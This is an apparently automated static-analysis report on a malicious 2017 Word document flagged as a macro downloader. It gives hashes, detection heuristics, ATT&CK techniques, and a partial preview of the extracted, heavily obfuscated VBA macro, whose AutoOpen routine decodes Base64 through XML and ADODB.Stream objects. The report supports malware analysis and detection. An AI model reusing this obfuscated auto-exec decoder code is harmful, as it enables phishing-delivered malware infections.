Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 66b70cf503d8b5d4…

MALICIOUS

Office (OLE)

163.0 KB Created: 2017-05-05 11:43:00 Authoring application: Microsoft Office Word First seen: 2017-05-13
MD5: cc2cbde00a288cce758f2d63ed6c93ac SHA-1: df5b5b8486aeea8a9d8c429697740d9fc39be892 SHA-256: 66b70cf503d8b5d45d0d01a0eddc07ab8a69c297e4b3571572b05c94620b0007
342 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing a VBA macro with an AutoOpen subroutine. This macro utilizes CreateObject and Shell() to execute a Base64-decoded PowerShell command stager, indicating a downloader or initial execution stage. The presence of the Shell() call and the specific PowerShell command stager strongly suggests a malicious intent to download and execute further payloads.

Heuristics 9

  • ClamAV: Doc.Downloader.WithMacro-6310867-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.WithMacro-6310867-0
  • VBA macros detected medium 5 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • VBA Base64-decoded Shell command stager critical OLE_VBA_BASE64_SHELL_COMMAND_STAGER
    VBA auto-exec macro decodes Base64 string literals into command or script-launch text and executes the result with Shell. This catches cmd/cscript/PowerShell/VBS launchers hidden from plain keyword matching.
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 17206 bytes
SHA-256: 25cda99f1d0da8e79aae1be61bd1c1c26d1f5fc7438cb7d36e1e8e32df705722
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"
Sub AutoOpen()

Dim swJD1aP6 As Boolean
swJD1aP6 = False
Dim lBfdQi As Double
lBfdQi = 62663.258433826
Dim Wa87uf As Boolean
Wa87uf = True
F8dva
End Sub

Attribute VB_Name = "Module2"
Public Function dD3ilQO(ByVal jTfWg)

Dim uu0pN7FDU As Byte
uu0pN7FDU = 113
Dim Xzvd2yBaA As Long
Xzvd2yBaA = -1374405482
Dim h3P6Zb As Single
h3P6Zb = Round(1262.4193239549)
Dim lMiNa4Su
Dim oLIQF2b
Dim U6xgET8 As Integer
U6xgET8 = Sgn(19223)
Dim iHc1oKW5j As Long
iHc1oKW5j = -1493592986
Dim FC1JkWL As Byte
FC1JkWL = 82
Dim tYC3wJ As Integer
tYC3wJ = Sgn(-22457)

Dim MydfL As Integer
MydfL = -21598
Dim G0SbnABF As Long
G0SbnABF = -1929898222
Set lMiNa4Su = CreateObject(xdhpXcO)
Dim wjx93n As Single
wjx93n = Round(34461.076033849)
Dim QDxhwk As Byte
QDxhwk = 212
Dim OQjBbkd As Double
OQjBbkd = Sgn(29356.940918728)
Dim vy98u As Integer
vy98u = 23865
Dim NY03x As Double
NY03x = 11504.587200717
Set oLIQF2b = lMiNa4Su.CreateElement(EpntLR)

Dim kXyjTQ3Z As Byte
kXyjTQ3Z = 170
Dim iNSaL4m As Single
iNSaL4m = 7200.9092840894
Dim NbYD5Md As String
NbYD5Md = vbNullString
Dim QduHA
QduHA = StrConv(H753JO, vbProperCase)
Dim VVEgaZ As Single
VVEgaZ = Sgn(49957.282412604)
With oLIQF2b
Dim B8JS7 As Long
B8JS7 = Sgn(0)
Dim rboz9Q2 As Byte
rboz9Q2 = 252
Dim U0v31Zs As Integer
U0v31Zs = -9722
oLIQF2b.DataType = "bin." & EpntLR
Dim m2CjTOZU As Long
m2CjTOZU = Sgn(0)
Dim e1pqcxfG As Double
e1pqcxfG = Round(879.62519730969)
oLIQF2b.Text = jTfWg
End With

Dim GkAwVy6 As Boolean
GkAwVy6 = True
Dim NtNc4kiPK As Byte
NtNc4kiPK = 137
Dim JV5lb As Long
JV5lb = Sgn(0)
dD3ilQO = MM9AP6(oLIQF2b.nodeTypedValue)
Dim daj2l
daj2l = Len(HTkePM3u)
Dim tLu4H As Integer
tLu4H = 30944
Set oLIQF2b = Nothing
Set lMiNa4Su = Nothing
End Function
Function MM9AP6(Binary)
Dim z8IMRmy As Long
z8IMRmy = Sgn(-970809712)
Dim EN0SAehaD As Single
EN0SAehaD = 46363.8290906
Dim uYvOS6 As Long
uYvOS6 = 0
Const C649c = 2
Const J5JkQwUVM = 1

Dim XHmQSZEk As Byte
XHmQSZEk = 202
Dim uoEb17jua As Boolean
uoEb17jua = True
Dim MR0sldcev As Long
MR0sldcev = Sgn(-929278598)
Dim NJsZjnU

Dim KgJfKDVGs As Byte
KgJfKDVGs = 52
Dim mhv0TFsy As Integer
mhv0TFsy = 24825
Dim X7wmUiO
X7wmUiO = StrConv(jcVvbx3, vbLowerCase)
Dim AaFywq As Byte
AaFywq = 244
Dim N0kTfIy3 As Boolean
N0kTfIy3 = False
Dim WmM0afn1Z As Byte
WmM0afn1Z = 53
Dim PSTpd6G As Long
PSTpd6G = -508499954
Dim Sg4TO0H As String
Sg4TO0H = Val("J")
Set NJsZjnU = CreateObject("adodb.stream")
Dim et3CoV As Long
et3CoV = Sgn(0)
Dim uB7TMZfh As Single
uB7TMZfh = Sgn(44170.589517774)
Dim jtobmUkzA As Double
jtobmUkzA = 63178.085553038
Dim PActslhme As Double
PActslhme = Round(45035.594744317)
With NJsZjnU
Dim klC62ZQf As Double
klC62ZQf = Sgn(14030.460836578)
Dim vy0efUGx As Long
vy0efUGx = Sgn(-1737644752)
Dim StAgI
StAgI = Asc("^")
Dim MA6fPR As String
MA6fPR = vbNullString
.Type = J5JkQwUVM
Dim rWpzVO As Double
rWpzVO = Fix(31693.630577065)
Dim g7ywe0cz As Double
g7ywe0cz = Round(39036.616020474)
.Open
Dim AAhtxa2fF As Single
AAhtxa2fF = Sgn(25611.007985664)
Dim HPO2Deafh
HPO2Deafh = ""
Dim MAMgEJ As Boolean
MAMgEJ = True
Dim tkA28h As Boolean
tkA28h = False
Dim NqXM5fk As Double
NqXM5fk = Sgn(50204.09539515)
.Write Binary
Dim OkzyQm As Long
OkzyQm = Sgn(0)
Dim M4CKa As String
M4CKa = StrConv(vTvcDSCFQ, vbProperCase)
.Position = 0

Dim O3tYkhKsM As Integer
O3tYkhKsM = -27842
Dim gBgZc24F As Single
gBgZc24F = 43034.963077576
.Type = C649c
Dim f2Pcx As Double
f2Pcx = Val(55913.562171349)
Dim yonlON As Boolean
yonlON = True
Dim P1XqQe As Double
P1XqQe = Sgn(29368.821322486)
Dim hB83bq5mK As Byte
hB83bq5mK = 176
Dim t6TRIL21g As Boolean
t6TRIL21g = True
Dim mexRF As Do
... (truncated)